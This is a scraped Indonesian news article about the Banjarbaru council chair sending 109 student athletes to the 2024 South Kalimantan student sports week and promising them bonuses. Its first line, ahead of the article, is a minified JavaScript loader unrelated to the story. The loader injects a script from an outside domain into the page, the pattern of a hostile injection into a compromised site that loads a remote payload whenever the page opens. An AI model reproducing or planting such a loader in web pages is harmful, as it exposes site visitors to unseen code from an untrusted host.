(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD BANJARBARU

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru


KANALKALIMANTAN.COM, BANJARBARU – Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah (Popda) Kalimantan Selatan (Kalsel) 2024 diyakini bisa terwujud.

Sebanyak 109 atlet dilepas berlaga dalam delanap cabang olahraga (cabor) yakni bola basket, sepak bola, voli, takraw, bulu tangkis, tenis, pencak silat, dan tinju.

Ketua DPRD Kota Banjarbaru, Fadliansyah Akbar yang ikut melepas atlet mengatakan, para atlet nanti akan menerima bonus atas kerja keras mencapai target di Popda Kalsel 2024.

“Tampil maksimal, kalau bisa minimal juara dua, ada bonusnya juga. Kalau bisa melebihi target kita bisa memberikan pertimbangan untuk mendapat bonus lebih dari yang diberikan,” ungkap Fadliansyah, Jumat (10/5/2024) pagi.

Baca juga: Wagub Edy Pratowo Maju Pilkada Kalteng, Siap Dipasang Posisi Apapun

“Tentunya ini untuk memotivasi para atlet, mudah-mudahan bisa sesuai target atau bahkan melebihi target,” sambung dia.

Tidak menutup kemungkinan, kata Fadliansyah, DPRD Banjarbaru ikut membantu memberikan bonus kepada para atlet yang berhasil mencapai target juara.

“Kalau saya melihat situasi, tapi kalau dari segi anggaran DPRD siap membantu memberikan bonus asalkan target itu benar-benar tercapai,” jelas dia.

Fadliansyah berharap para atlet pelajar Kota Banjarbaru selalu menjaga kesehatan dan kebugaran tubuh sebelum pertandingan.

“Jaga pola tidur yang cukup, karena menurut saya penting, kalau ketika tidur mencukupi otomatis fresh, stamina semakin kuat,” tuntasnya.

Baca juga: Target Juara Umum Popda Kalsel 2024, Aditya Janji Beri Bonus Pribadi

Muhammad Raka Alghifari, atlet Banjarbaru dalam ajang Popda Kalsel 2024. Foto: wanda

Sementara itu, salah satu atlet cabor sepak bola, Muhammad Raka Alghifari menaruh harapan untuk membawa nama Banjarbaru menjadi juara.

“Dengan tiga bulan persiapan termasuk saat bulan puasa kemarin, harapannya target cabor kami bisa masuk lebih dari semifinal,” ujar pelajar SMAN 3 Banjarbaru ini.

Baca juga: Ancaman Banjir Rob di Pesisir Kalsel saat Fase Bulan Baru

Raka yang merupakan penjaga gawang tim Kota Banjarbaru ini mengaku mendapatkan banyak dukungan, baik dari orangtua hingga guru-guru di sekolah.

Tentunya juga, kata dia dengan pemberian bonus dari Wali Kota juga akan menjadi kunci motivasi para atlet untuk bisa menyebut gelar juara. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

4 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

4 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

5 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

5 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

7 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

7 jam ago

This website uses cookies.